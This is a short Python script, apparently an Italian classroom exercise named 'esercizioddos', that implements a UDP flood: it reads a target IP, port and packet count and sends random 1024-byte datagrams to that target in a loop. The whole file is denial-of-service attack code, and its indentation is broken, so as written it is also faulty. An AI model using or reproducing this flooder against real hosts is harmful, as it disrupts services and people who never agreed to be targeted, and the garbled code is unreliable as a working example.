

esercizioddos.py X

esercizioddos.py > ...

```
1  import random
2  import socket
3
4  def UDP_flood():
5      dati_da_inviare = random._urandom(1024)
6      # while true:
7          for x in range (numero_pacchetti):
8              s.sendto(dati_da_inviare, target)
9              print ("#",x,"- UDP inviato\n")
10
11     indirizzo_ip = str(input("inserisci l'indirizzo IP Target"))
12     port = int(input("Inserisci la porta:"))
13     numero_pacchetti = int(input("Inserisci il numero di pacchetti da inviare:"))
14
15     try:
16         s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
17         target = (str(indirizzo_ip),int(port))
18
19     except:
20         s.close()
21         print("[!] Error!!!")
22
23     UDP_flood()
```